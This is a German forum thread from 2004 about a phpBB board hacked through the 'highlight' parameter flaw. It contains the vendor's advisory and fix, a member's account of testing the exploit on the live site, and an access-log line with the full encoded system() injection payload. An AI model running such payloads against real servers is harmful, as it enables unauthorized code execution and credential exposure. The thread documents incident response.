https://rchelifan.org/

Wurm ? gehackt ?

https://rchelifan.org/viewtopic.php?t=920

Seite 1 von 1

#1 Wurm ? gehackt ?

Verfasst: 21.12.2004 09:00:29
von higgy
Hi,
war heute n8 das Forum gehackt ?
Ist denn das phpbb 2.0.1 nicht sicher ?
Ich dachte das wär gefixt .. heul

#2

Verfasst: 21.12.2004 09:06:27
von tracer
Ich bin noch am reparieren.

Ich war seit zwei Stunden auf dem Rechner, bastelte an einer anderen Site, als mein VI mir erzählte, dass die Datei auf der Platte geändert wurde, an der ich gerade arbeite.

Ich versuche jetzt aus dem Backup alles zu recover, weiss aber nicht nicht, was passiert ist :(

mfg,
tracer

#3

Verfasst: 21.12.2004 09:12:39
von Richard
:( ,

solche A***löcher, jetzt ist irgendwem ein achterl abgegangen oder wie ??..

Voll sinnig solche Aktionen :evil: :evil:


Richard

#4

Verfasst: 21.12.2004 09:14:21
von tracer
Ja, ich bin auch ganz schön gallig.

Ich vermute, ein Exploit im phpbb, kann es aber noch nicht genau sagen.

#5

Verfasst: 21.12.2004 11:20:27
von Dome
Following my original post it has been brought to our attention that the highlighting exploit can be taken advantage of, and it a serious way. We are hastily preparing a new release. However that release contains a number of other fixes and additions and thus we carrying out some internal testing to limit the chances of other issues arising.

In the mean time we strongly, and I mean strongly! urge all our users to make the following change to viewtopic.php as a matter of urgency.

Open viewtopic.php in any text editor. Find the following section of code:
Code:

Code: Alles auswählen

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

   for($i = 0; $i < sizeof($words); $i++)
   {
and replace with:
Code:

Code: Alles auswählen

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

   for($i = 0; $i < sizeof($words); $i++)
   {
Please inform as many people as possible about this issue. If you're a hosting provider please inform your customers if possible. Else we advise you implement some level of additional security if you run ensim or have PHP running cgi under suexec, etc.
is das der hier evtl?
hab ich grad gefunden in google ;)

ich werde das grade mal testen, hoffe du hast nix dagegen

#6

Verfasst: 21.12.2004 11:38:45
von tracer
Wo hast Du das gefunden?
Gibt es einen bug im urldecode?

#7

Verfasst: 21.12.2004 11:49:38
von tracer
So, habe das jetzt hier gefixed, und die Berechtigungen noch schärfer angezogen.
In TzaZickes Forum ist schon 2.0.11 im Einsatz.

mfg,
tracer

#8

Verfasst: 21.12.2004 11:49:53
von Dome
hoffentlich haste das update drauf gemacht
hab den link gefunden wie man den bug used
ging auch
hat man schön dein db name gesehn und passwort auch...

#9

Verfasst: 21.12.2004 11:58:28
von tracer
Und, funktioniert der Fix?

#10

Verfasst: 21.12.2004 12:00:06
von Dome
jop scheint so

#11

Verfasst: 21.12.2004 18:21:59
von tracer
Also, nu haben wirs, war nen Script Kiddie, das ne bekannte Sicherheitslücke mit bekannten Exploit verwendet hat.

Passiert mir nicht nochmal, hoffe ich.

Hier die Details, falls jemand Interesse hat:
195.149.227.13 - - [21/Dec/2004:07:11:29 +0100] "GET /viewtopic.php?p=4364&sid=dab898a1247b8ba2cd6ade97a0f04c31&highlight=%25
27%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%25
2echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%25
2echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%25
2echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%
252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%2
52echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%25
2echr(34))%252e%2527 HTTP/1.0" 200 139054 "http://www.rchelifan.org/viewtopic.php? ... de97a0f04c
31&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32
)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)
%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102
)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(11
0)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(11
1)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

und davon folgen dann halt etliche Einträge...

mfg,
tracer
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de